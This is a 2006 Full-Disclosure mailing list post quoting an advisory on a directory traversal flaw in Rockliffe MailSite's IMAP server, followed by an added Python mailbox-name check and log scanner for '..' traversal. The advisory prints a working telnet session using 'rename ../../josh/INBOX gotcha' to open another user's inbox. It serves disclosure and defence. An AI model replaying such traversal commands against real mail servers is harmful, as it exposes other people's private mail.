[Full-disclosure] Rockliffe Directory Traversal Vulnerability
stan.bubrouski at gmail.com
Wed Jan 4 17:03:40 GMT 2006
Seeing as most IMAP servers allow you to use ../../ with SELECT, etc.
(think uw-imapd for example) I think I would categorize this as more
of a permissions problem.
On 1/4/06, Josh Zlatin <jzlatin at ramat.cc> wrote:
> Synopsis: Rockliffe's Mailsite IMAP Directory Traversal Vulnerability.
> Product: Rockliffe Mailsite
> Version: Confirmed on Mailsite < 18.104.22.168
> Author: Josh Zlatin-Amishav
> Date: January 4, 2006
> Rockliffe MailSite secure email server software and MailSite MP secure email
> gateways provide email server solutions and gateway email protection for
> businesses and service providers. Rockliffe has more than 3,000 customers
> hosting more than 15 million mailboxes worldwide.
> In working with researchers at Tenable Network Security, I have come across
> a directory traversal flaw in the IMAP server. It is possible for an
> authenticated user to access any user's inbox via a RENAME command.
> josh at lab1:~$ telnet 10.0.0.5 143
> Trying 10.0.0.5...
> Connected to 10.0.0.5.
> Escape character is '^]'.
> * OK MailSite IMAP4 Server 22.214.171.124 ready
> a1 login joe pass
> a1 OK LOGIN completed
> a2 rename ../../josh/INBOX gotcha
> a2 OK RENAME folder ../../josh/INBOX renamed to gotcha
> a3 select gotcha
> * FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
> * 0 EXISTS
> * 0 RECENT
> * OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)]
> * OK [UNSEEN 0]
> * OK [UIDVALIDITY 514563061] UIDs are valid
> a3 OK [READ-WRITE] opened gotcha
> user joe can now access the contents of user josh's INBOX directory.
> Vendor notified: January 3, 2006 06:12AM
> Vendor Response:
> Contact your sales rep about purchasing Mailsite 126.96.36.199
> Mailsite fixed a buffer overrun in the Mailsite IMAP server which also fixes
> the directory traversal problem. Either upgrade to version 6.1.22 and install
> the hotfix (i.e. upgrade to 188.8.131.52), or install the latest version of
> Mailsite. The hotfix can be obtained at:
> References: http://www.rockliffe.com
> References: http://zur.homelinux.com/Advisories/RockliffeMailsiteDirTransveral.txt
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
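A defender's view of the flaw above: a mailbox-name containment check of the kind the server should have applied to the RENAME argument, plus a scan of IMAP command logs for the same ".." pattern. This is an added example, not Rockliffe's code or the advisory's; the /var/mail layout, the "/" hierarchy delimiter and the log line format are assumptions.

```python
"""Mailbox-name containment check for an IMAP server, plus a scan of
client command lines for the RENAME traversal in the advisory. Added
example; MAILROOT, the delimiter and the log format are assumptions."""
import posixpath
import re

MAILROOT = "/var/mail"   # assumed store layout: one directory per user
DELIM = "/"              # assumed IMAP hierarchy delimiter


class BadMailboxName(ValueError):
    """Raised for any mailbox name that could leave the user's directory."""


def resolve_mailbox(user: str, name: str) -> str:
    """Map a client-supplied mailbox name (RENAME/SELECT/CREATE argument)
    to a filesystem path, refusing anything outside the user's root."""
    if not name or name.startswith(DELIM):
        raise BadMailboxName("empty or absolute mailbox name")
    for part in name.split(DELIM):
        # "." and ".." are never valid components; an empty part means a
        # doubled delimiter that normpath would silently collapse.
        if part in ("", ".", "..") or "\x00" in part:
            raise BadMailboxName(f"illegal component {part!r}")
    user_root = posixpath.join(MAILROOT, user)
    path = posixpath.normpath(posixpath.join(user_root, name))
    # Defence in depth: confirm containment after normalisation as well.
    if posixpath.commonpath([user_root, path]) != user_root:
        raise BadMailboxName("mailbox name escapes user root")
    return path


def is_safe_mailbox(user: str, name: str) -> bool:
    """Boolean wrapper around resolve_mailbox for policy checks."""
    try:
        resolve_mailbox(user, name)
        return True
    except BadMailboxName:
        return False


# Constructed log format: "<client-ip> <tag> <command> <args>".
_CMD = re.compile(r"^(?P<ip>\S+)\s+(?P<tag>\S+)\s+(?P<cmd>\w+)\s*(?P<args>.*)$")
_TRAVERSAL = re.compile(r"(?:^|[/\\])\.\.(?:[/\\]|$)")
_MAILBOX_CMDS = {"RENAME", "SELECT", "EXAMINE", "CREATE", "DELETE", "LIST"}


def traversal_attempts(log_lines):
    """Return (ip, command, argument) for every mailbox-taking command
    whose argument contains a '..' path component."""
    hits = []
    for line in log_lines:
        m = _CMD.match(line.strip())
        if not m or m["cmd"].upper() not in _MAILBOX_CMDS:
            continue
        for arg in m["args"].split():
            if _TRAVERSAL.search(arg.strip('"')):
                hits.append((m["ip"], m["cmd"].upper(), arg))
    return hits
```

Run over the session in the advisory, the RENAME line is the only hit, and resolve_mailbox would have rejected its argument before any filesystem operation.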